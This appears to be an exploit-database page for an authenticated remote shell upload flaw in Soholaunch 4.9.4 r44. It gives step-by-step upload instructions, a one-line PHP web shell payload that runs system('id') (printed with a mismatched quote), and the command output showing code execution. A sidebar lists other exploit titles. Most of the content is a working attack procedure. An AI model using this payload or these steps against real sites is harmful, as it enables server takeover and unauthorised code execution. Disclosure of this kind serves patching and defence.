Home Tools Exploits & CVE's Soholaunch 4.9.4 r44 Shell Upload

Soholaunch 4.9.4 r44 Shell Upload

April 2, 2024

Authored by tmrswrr

Soholaunch version 4.9.4 r44 suffers from a remote shell upload vulnerability.

## Exploit Title: Soholaunch Version : v4.9.4 r44 Remote Code Execution
### Date: 2024-3-29
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://www.soholaunch.com/
### Version : v4.9.4 r44


1 ) Login with admin cred click Main Menu > File Manager > Upload New Files > Uploading test.php file
 
Payload : <?php echo system('id); ?>

2 ) After click File Manager > Images > test.php : https://127.0.0.1/Soholaunch/images/test.php

Result: uid=1000(soho) gid=1000(soho) groups=1000(soho) uid=1000(soho) gid=1000(soho) groups=1000(soho)

Soholaunch 4.9.4 r44 Shell Upload

Follow us on Instagram @thecyberpost

EDITOR PICKS

osCommerce 4 Cross Site Scripting

undefinedExploiting The NT Kernel In 24H2undefined

Windows NtQueryInformationThread Double-Fetch / Arbitrary Write

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Dirty Pipe Local Privilege Escalation

IOTransfer 4.0 Remote Code Execution

Trojan-Spy.Win32.SpyEyes.hqd Insecure Permissions